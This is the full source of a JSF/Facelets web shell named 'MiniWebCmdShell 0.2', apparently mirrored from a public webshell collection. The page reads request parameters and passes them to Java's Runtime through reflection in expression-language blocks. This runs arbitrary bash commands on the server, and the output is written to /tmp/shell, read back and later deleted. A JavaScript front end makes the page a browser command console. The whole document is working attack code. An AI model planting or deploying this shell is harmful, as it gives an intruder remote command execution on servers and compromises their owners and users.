mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
103 lines
No EOL
3.6 KiB
HTML
103 lines
No EOL
3.6 KiB
HTML
<?xml version='1.0' encoding='UTF-8' ?>
|
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|
|
<html xmlns="http://www.w3.org/1999/xhtml"
|
|
xmlns:ui="http://java.sun.com/jsf/facelets"
|
|
xmlns:h="http://java.sun.com/jsf/html"
|
|
xmlns:c="http://xmlns.jcp.org/jsp/jstl/core">
|
|
<style type="text/css">
|
|
.wrapper{
|
|
border: 2px solid black;
|
|
background-color: #C0C0C0 ;
|
|
overflow:hidden;
|
|
margin: auto;
|
|
width: 50%;
|
|
word-wrap: break-word;
|
|
}
|
|
.field{
|
|
margin: 20px;
|
|
}
|
|
|
|
.output{
|
|
|
|
}
|
|
body{
|
|
background-color: #383838;
|
|
}
|
|
</style>
|
|
<body>
|
|
|
|
<c:choose>
|
|
<c:when test="${request.getParameter('do') != null}">
|
|
#{view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1,2".split(",").getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),("/bin/bash,-c,".concat(request.getParameter("do")).concat(">/tmp/shell")).split(","))}
|
|
</c:when>
|
|
|
|
<c:when test="${request.getParameter('cmd') !=null}">
|
|
<code>
|
|
<i>${request.getParameter("cmd")}</i>:
|
|
<pre>#{ view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("next").invoke(
|
|
view.getClass().getClassLoader().loadClass("java.util.Scanner").getMethod("useDelimiter", "a".getClass()).invoke(
|
|
view.getClass().getClassLoader().loadClass("java.util.Scanner").getConstructor(view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell").getClass()).newInstance(
|
|
view.getClass().getClassLoader().loadClass("java.io.File").getConstructor("a".getClass()).newInstance("/tmp/shell")
|
|
),"\\Z"
|
|
)
|
|
)}</pre>
|
|
</code>
|
|
</c:when>
|
|
|
|
<c:when test="${request.getParameter('clear')!= null}">
|
|
${view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("exec","1".getClass()).invoke(view.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null),"rm /tmp/shell")}
|
|
</c:when>
|
|
</c:choose>
|
|
|
|
|
|
|
|
|
|
<div class="wrapper">
|
|
<div class="field">
|
|
<center>----------------------------------------------------------</center>
|
|
<div class="output" id="output">
|
|
|
|
</div>
|
|
<center>----------------------------------------------------------</center>
|
|
<center>
|
|
<form onsubmit="return startMagic()">
|
|
<input autocomplete="off" id='cmd' name='cmd' size='100' placeholder='command' style="text-align:center; "/>
|
|
</form>
|
|
</center>
|
|
<center><font size="1"><i>Java Server Faces MiniWebCmdShell 0.2 by HeartLESS.</i></font></center>
|
|
</div>
|
|
</div>
|
|
</body>
|
|
<script type="text/javascript">
|
|
var xmlhttp;
|
|
if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safari
|
|
xmlhttp=new XMLHttpRequest();
|
|
} else {// code for IE6, IE5
|
|
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
|
|
}
|
|
|
|
function startMagic(){
|
|
try{
|
|
//execution
|
|
xmlhttp.open("GET",location.pathname+"?do=" + encodeURI(document.getElementById("cmd").value),false);
|
|
xmlhttp.send();
|
|
console.log(xmlhttp.responseText);
|
|
//reading
|
|
xmlhttp.open("GET",location.pathname+"?cmd=" + encodeURI(document.getElementById("cmd").value),false);
|
|
xmlhttp.send();
|
|
a = xmlhttp.responseText.indexOf('<code>');
|
|
b = xmlhttp.responseText.indexOf('</code>');
|
|
document.getElementById('output').innerHTML = xmlhttp.responseText.substr(a+6,b-a -6);
|
|
//cleaning
|
|
xmlhttp.open("GET",location.pathname+"?clear",true);
|
|
xmlhttp.send();
|
|
}catch(e){
|
|
console.log(e);
|
|
}
|
|
return false;
|
|
}
|
|
|
|
|
|
</script>
|
|
|
|
</html> |